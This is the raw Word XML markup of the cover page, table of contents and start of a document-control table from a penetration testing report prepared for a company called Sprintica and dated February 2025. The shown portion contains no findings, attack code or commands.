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3B094A" w:rsidRDefault="003B094A" w:rsidP="007D2747">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Hlk191132032"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="2F348C2E" w14:textId="77777777" w:rsidR="003B094A" w:rsidRDefault="00963AEF" w:rsidP="007D2747">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia" w:cs="Georgia"/>
          <w:b/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia" w:cs="Georgia"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">                                                     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A37501D" w14:textId="77777777" w:rsidR="003B094A" w:rsidRDefault="003B094A" w:rsidP="007D2747">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia" w:cs="Georgia"/>
          <w:b/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DAB6C7B" w14:textId="77777777" w:rsidR="003B094A" w:rsidRDefault="003B094A" w:rsidP="007D2747">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia" w:cs="Georgia"/>
          <w:b/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02EB378F" w14:textId="77777777" w:rsidR="003B094A" w:rsidRDefault="003B094A" w:rsidP="007D2747">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A05A809" w14:textId="77777777" w:rsidR="003B094A" w:rsidRDefault="003B094A" w:rsidP="007D2747">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0186D2E7" w14:textId="27250FF8" w:rsidR="003B094A" w:rsidRDefault="00963AEF" w:rsidP="007D2747">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
        <w:t>(Penetration testing Report)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A39BBE3" w14:textId="77777777" w:rsidR="003B094A" w:rsidRDefault="003B094A" w:rsidP="007D2747">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia" w:cs="Georgia"/>
          <w:b/>
          <w:color w:val="1C4587"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41C8F396" w14:textId="77777777" w:rsidR="003B094A" w:rsidRDefault="003B094A" w:rsidP="007D2747">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16C8E936" w14:textId="1A9A8FF2" w:rsidR="003B094A" w:rsidRDefault="00963AEF" w:rsidP="007D2747">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Prepared By:</w:t>
      </w:r>
      <w:r w:rsidR="002D44D8">
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> Nauman Munir, Omar </w:t>
      </w:r>
      <w:r w:rsidR="002D44D8" w:rsidRPr="002D44D8">
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Hassan</w:t>
      </w:r>
      <w:r w:rsidR="002D44D8">
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002D44D8" w:rsidRPr="002D44D8">
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Asma Jamal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F5C769F" w14:textId="7592EBC3" w:rsidR="003B094A" w:rsidRDefault="00963AEF" w:rsidP="007D2747">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Delivered To: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002D44D8" w:rsidRPr="002D44D8">
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Sprintica</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="69960788" w14:textId="7375F6F5" w:rsidR="003B094A" w:rsidRDefault="00963AEF" w:rsidP="007D2747">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Submission Date:  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidR="002D44D8">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>02/23/2025</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A3D3EC" w14:textId="77777777" w:rsidR="003B094A" w:rsidRDefault="003B094A" w:rsidP="007D2747">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D0B940D" w14:textId="77777777" w:rsidR="003B094A" w:rsidRDefault="003B094A" w:rsidP="007D2747">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E27B00A" w14:textId="77777777" w:rsidR="003B094A" w:rsidRDefault="003B094A" w:rsidP="007D2747">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60061E4C" w14:textId="77777777" w:rsidR="003B094A" w:rsidRDefault="003B094A" w:rsidP="007D2747">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44EAFD9C" w14:textId="77777777" w:rsidR="003B094A" w:rsidRDefault="003B094A" w:rsidP="007D2747">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B94D5A5" w14:textId="77777777" w:rsidR="003B094A" w:rsidRDefault="003B094A" w:rsidP="007D2747">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia" w:cs="Georgia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DEEC669" w14:textId="77777777" w:rsidR="003B094A" w:rsidRDefault="003B094A" w:rsidP="007D2747">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia" w:cs="Georgia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3656B9AB" w14:textId="77777777" w:rsidR="003B094A" w:rsidRDefault="003B094A" w:rsidP="007D2747">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia" w:cs="Georgia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45FB0818" w14:textId="77777777" w:rsidR="003B094A" w:rsidRDefault="003B094A" w:rsidP="007D2747">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia" w:cs="Georgia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="049F31CB" w14:textId="77777777" w:rsidR="003B094A" w:rsidRDefault="003B094A" w:rsidP="007D2747">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia" w:cs="Georgia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53128261" w14:textId="77777777" w:rsidR="003B094A" w:rsidRDefault="003B094A" w:rsidP="007D2747">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia" w:cs="Georgia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62486C05" w14:textId="77777777" w:rsidR="003B094A" w:rsidRDefault="003B094A" w:rsidP="007D2747">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia" w:cs="Georgia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4101652C" w14:textId="77777777" w:rsidR="003B094A" w:rsidRDefault="003B094A" w:rsidP="007D2747">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia" w:cs="Georgia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B99056E" w14:textId="77777777" w:rsidR="003B094A" w:rsidRDefault="003B094A" w:rsidP="007D2747">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia" w:cs="Georgia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22E0FC93" w14:textId="77777777" w:rsidR="003B094A" w:rsidRDefault="00963AEF" w:rsidP="007D2747">
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="38"/>
          <w:szCs w:val="38"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="38"/>
          <w:szCs w:val="38"/>
        </w:rPr>
        <w:t>Table of Contents</w:t>
      </w:r>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:id w:val="-1789740017"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtContent>
        <w:p w14:paraId="1F137A67" w14:textId="77777777" w:rsidR="003B094A" w:rsidRDefault="00963AEF" w:rsidP="007D2747">
          <w:pPr>
            <w:pBdr>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
              <w:between w:val="nil"/>
            </w:pBdr>
            <w:tabs>
              <w:tab w:val="right" w:pos="10070"/>
            </w:tabs>
            <w:spacing w:after="100"/>
            <w:rPr>
              <w:color w:val="000000"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> TOC \h \u \z \t "Heading 1,1,Heading 2,2,Heading 3,3,Heading 4,4,Heading 5,5,Heading 6,6,"</w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_heading=h.gjdgxs">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>1. Document Control</w:t>
            </w:r>
          </w:hyperlink>
          <w:hyperlink w:anchor="_heading=h.gjdgxs">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:tab/>
              <w:t>1</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6410BFBD" w14:textId="77777777" w:rsidR="003B094A" w:rsidRDefault="00963AEF" w:rsidP="007D2747">
          <w:pPr>
            <w:pBdr>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
              <w:between w:val="nil"/>
            </w:pBdr>
            <w:tabs>
              <w:tab w:val="right" w:pos="10070"/>
            </w:tabs>
            <w:spacing w:after="100"/>
            <w:rPr>
              <w:color w:val="000000"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_heading=h.30j0zll">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>2. Version Control</w:t>
            </w:r>
          </w:hyperlink>
          <w:hyperlink w:anchor="_heading=h.30j0zll">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:tab/>
              <w:t>2</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="078F266A" w14:textId="77777777" w:rsidR="003B094A" w:rsidRDefault="00963AEF" w:rsidP="007D2747">
          <w:pPr>
            <w:pBdr>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
              <w:between w:val="nil"/>
            </w:pBdr>
            <w:tabs>
              <w:tab w:val="right" w:pos="10070"/>
            </w:tabs>
            <w:spacing w:after="100"/>
            <w:rPr>
              <w:color w:val="000000"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_heading=h.3znysh7">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>3.Executive Summary</w:t>
            </w:r>
          </w:hyperlink>
          <w:hyperlink w:anchor="_heading=h.3znysh7">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:tab/>
              <w:t>2</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="52160140"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2et92p0">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>3.1 Overview</w:t>
            </w:r>
          </w:hyperlink>
          <w:hyperlink w:anchor="_heading=h.2et92p0">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:tab/>
              <w:t>3</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1FC71F85"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tyjcwt">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">3.2 </w:t>
            </w:r>
          </w:hyperlink>
          <w:hyperlink w:anchor="_heading=h.tyjcwt">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Timeline</w:t>
            </w:r>
          </w:hyperlink>
          <w:hyperlink w:anchor="_heading=h.tyjcwt">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:tab/>
              <w:t>3</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="365CACB2"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3dy6vkm">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>3.3 Findings Summary</w:t>
            </w:r>
          </w:hyperlink>
          <w:hyperlink w:anchor="_heading=h.3dy6vkm">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:tab/>
              <w:t>4</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3837CE7B" w14:textId="77777777" w:rsidR="003B094A" w:rsidRDefault="00963AEF" w:rsidP="007D2747">
          <w:pPr>
            <w:pBdr>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
              <w:between w:val="nil"/>
            </w:pBdr>
            <w:tabs>
              <w:tab w:val="right" w:pos="10070"/>
            </w:tabs>
            <w:spacing w:after="100"/>
            <w:rPr>
              <w:color w:val="000000"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_heading=h.4d34og8">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>4. Penetration Testing Methodology</w:t>
            </w:r>
          </w:hyperlink>
          <w:hyperlink w:anchor="_heading=h.4d34og8">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:tab/>
              <w:t>4</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="52947AB1" w14:textId="77777777" w:rsidR="003B094A" w:rsidRDefault="00963AEF" w:rsidP="007D2747">
          <w:pPr>
            <w:pBdr>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
              <w:between w:val="nil"/>
            </w:pBdr>
            <w:tabs>
              <w:tab w:val="right" w:pos="10070"/>
            </w:tabs>
            <w:spacing w:after="100"/>
            <w:rPr>
              <w:color w:val="000000"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_heading=h.17dp8vu">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>5. Scope</w:t>
            </w:r>
          </w:hyperlink>
          <w:hyperlink w:anchor="_heading=h.17dp8vu">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:tab/>
              <w:t>6</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2E112CE5"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3rdcrjn">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>5.1 Targets</w:t>
            </w:r>
          </w:hyperlink>
          <w:hyperlink w:anchor="_heading=h.3rdcrjn">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:tab/>
              <w:t>6</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3C4DEBA5"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26in1rg">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>5.2 Limitations</w:t>
            </w:r>
          </w:hyperlink>
          <w:hyperlink w:anchor="_heading=h.26in1rg">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:tab/>
              <w:t>6</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="366407FE" w14:textId="77777777" w:rsidR="003B094A" w:rsidRDefault="00963AEF" w:rsidP="007D2747">
          <w:pPr>
            <w:pBdr>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
              <w:between w:val="nil"/>
            </w:pBdr>
            <w:tabs>
              <w:tab w:val="right" w:pos="10070"/>
            </w:tabs>
            <w:spacing w:after="100"/>
            <w:rPr>
              <w:color w:val="000000"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_heading=h.lnxbz9">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>6. Findings</w:t>
            </w:r>
          </w:hyperlink>
          <w:hyperlink w:anchor="_heading=h.lnxbz9">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:tab/>
              <w:t>7</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1299C43A" w14:textId="77777777" w:rsidR="003B094A" w:rsidRDefault="00963AEF" w:rsidP="007D2747">
          <w:pPr>
            <w:tabs>
              <w:tab w:val="right" w:pos="10080"/>
            </w:tabs>
            <w:spacing w:before="200" w:after="80"/>
            <w:rPr>
              <w:b/>
              <w:color w:val="000000"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="4DDBEF00" w14:textId="77777777" w:rsidR="003B094A" w:rsidRDefault="003B094A" w:rsidP="007D2747">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3461D779"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3CF2D8B6"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0FB78278"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1FC39945"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0562CB0E"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34CE0A41"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62EBF3C5"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6D98A12B"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2946DB82"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5997CC1D"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110FFD37" w14:textId="77777777" w:rsidR="003B094A" w:rsidRDefault="003B094A" w:rsidP="007D2747">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B699379" w14:textId="77777777" w:rsidR="003B094A" w:rsidRDefault="003B094A" w:rsidP="007D2747"/>
    <w:p w14:paraId="0E95CEDE" w14:textId="77777777" w:rsidR="003B094A" w:rsidRDefault="00963AEF" w:rsidP="007D2747">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_heading=h.gjdgxs" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>1. Document Control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE9F23F" w14:textId="77777777" w:rsidR="003B094A" w:rsidRDefault="003B094A" w:rsidP="007D2747"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a7"/>
        <w:tblW w:w="8910" w:type="dxa"/>
        <w:jc w:val="center"/>
        <w:tblBorders>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:insideH w:val="nil"/>
          <w:insideV w:val="nil"/>
        </w:tblBorders>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0600" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2220"/>
        <w:gridCol w:w="6690"/>
      </w:tblGrid>
      <w:tr w:rsidR="003B094A" w14:paraId="7694E643" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="485"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2220" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="7F7F7F"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="291E35A2"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Content</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6690" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="7F7F7F"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="43C305B6" w14:textId="0308D535" w:rsidR="003B094A" w:rsidRDefault="002D44D8" w:rsidP="007D2747">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
              </w:rPr>
              <w:t>Pentesting</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003B094A" w14:paraId="682FDFB4" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="470"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2220" w:type="dxa"/>
            <w:tcBorders>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="7F7F7F"/>
